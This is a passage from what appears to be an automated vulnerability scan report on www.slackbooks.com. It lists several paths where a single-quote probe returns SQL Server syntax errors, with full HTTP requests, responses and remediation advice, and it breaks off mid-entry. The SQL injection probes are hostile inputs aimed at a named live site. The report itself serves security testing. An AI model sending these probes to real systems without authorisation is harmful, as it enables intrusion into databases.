GET /Athletic+Training'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:56:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 12000
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /Manual+Therapy' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:59:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10029
<html> <head> <title>Unclosed quotation mark before the character string 'manual+therapy''.<br>Line 1: Incorrect syntax near 'manual+therapy''.</title> <style> body {f ...[SNIP]...
Request 2
GET /Manual+Therapy'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:59:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11990
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /Orthotics+and+Prosthetics' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 17:00:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10139
<html> <head> <title>Unclosed quotation mark before the character string 'orthotics+and+prosthetics''.<br>Line 1: Incorrect syntax near 'orthotics+and+prosthetics''.</title> <st ...[SNIP]...
Request 2
GET /Orthotics+and+Prosthetics'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 17:00:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 12028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /Physical+Therapy' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 17:02:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10049
<html> <head> <title>Unclosed quotation mark before the character string 'physical+therapy''.<br>Line 1: Incorrect syntax near 'physical+therapy''.</title> <style> bod ...[SNIP]...
Request 2
GET /Physical+Therapy'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 17:02:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11998
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /aclreconstuct' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:56:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10019
<html> <head> <title>Unclosed quotation mark before the character string 'aclreconstuct''.<br>Line 1: Incorrect syntax near 'aclreconstuct''.</title> <style> body {fon ...[SNIP]...
Request 2
GET /aclreconstuct'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:56:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11988
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Site Name: Slackbooks.com -->
<html xmlns="http://www.w3.org/ ...[SNIP]...
1.52. http://www.slackbooks.com/aclreconstuct [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.slackbooks.com
Path:
/aclreconstuct
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /aclreconstuct?1'=1 HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:56:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 9884
<html> <head> <title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title> <style> body {font-family:"Verdana";font-wei ...[SNIP]...
Request 2
GET /aclreconstuct?1''=1 HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:56:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 12002
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ccacl' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:57:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 9939
<html> <head> <title>Unclosed quotation mark before the character string 'ccacl''.<br>Line 1: Incorrect syntax near 'ccacl''.</title> <style> body {font-family:"Verdan ...[SNIP]...
Request 2
GET /ccacl'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:57:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11960
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Site Name: Slackbooks.com -->
<html xmlns="http://www.w3.org/ ...[SNIP]...
1.54. http://www.slackbooks.com/ccacl [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.slackbooks.com
Path:
/ccacl
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ccacl?1'=1 HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:57:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 9884
<html> <head> <title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title> <style> body {font-family:"Verdana";font-wei ...[SNIP]...
Request 2
GET /ccacl?1''=1 HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:57:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11974
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ccknee' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:57:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 9949
<html> <head> <title>Unclosed quotation mark before the character string 'ccknee''.<br>Line 1: Incorrect syntax near 'ccknee''.</title> <style> body {font-family:"Verd ...[SNIP]...
Request 2
GET /ccknee'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:57:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11962
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Site Name: Slackbooks.com -->
<html xmlns="http://www.w3.org/ ...[SNIP]...
1.56. http://www.slackbooks.com/ccknee [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.slackbooks.com
Path:
/ccknee
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ccknee?1'=1 HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:57:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 9884
<html> <head> <title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title> <style> body {font-family:"Verdana";font-wei ...[SNIP]...
Request 2
GET /ccknee?1''=1 HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:57:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11980
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /clinical+nursing+resources' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:57:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10149
<html> <head> <title>Unclosed quotation mark before the character string 'clinical+nursing+resources''.<br>Line 1: Incorrect syntax near 'clinical+nursing+resources''.</title> < ...[SNIP]...
Request 2
GET /clinical+nursing+resources'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sun, 06 Feb 2011 16:57:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 12030
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /essentialknee' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sat, 05 Feb 2011 22:09:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10019
<html> <head> <title>Unclosed quotation mark before the character string 'essentialknee''.<br>Line 1: Incorrect syntax near 'essentialknee''.</title> <style> body {fon ...[SNIP]...
Request 2
GET /essentialknee'' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sat, 05 Feb 2011 22:09:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=xekihsnsspcr3pi5wrb1km45; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 11988
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Site Name: Slackbooks.com -->
<html xmlns="http://www.w3.org/ ...[SNIP]...
1.59. http://www.slackbooks.com/essentialknee [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.slackbooks.com
Path:
/essentialknee
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /essentialknee?1'=1 HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sat, 05 Feb 2011 22:09:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 9884
<html> <head> <title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title> <style> body {font-family:"Verdana";font-wei ...[SNIP]...
Request 2
GET /essentialknee?1''=1 HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Connection: close Date: Sat, 05 Feb 2011 22:09:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=q1glzym555hwgv3nndsy4d55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 12002
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /gastroenterology' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:57:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10049
<html> <head> <title>Unclosed quotation mark before the character string 'gastroenterology''.<br>Line 1: Incorrect syntax near 'gastroenterology''.</title> <style> bod ...[SNIP]...
Request 2
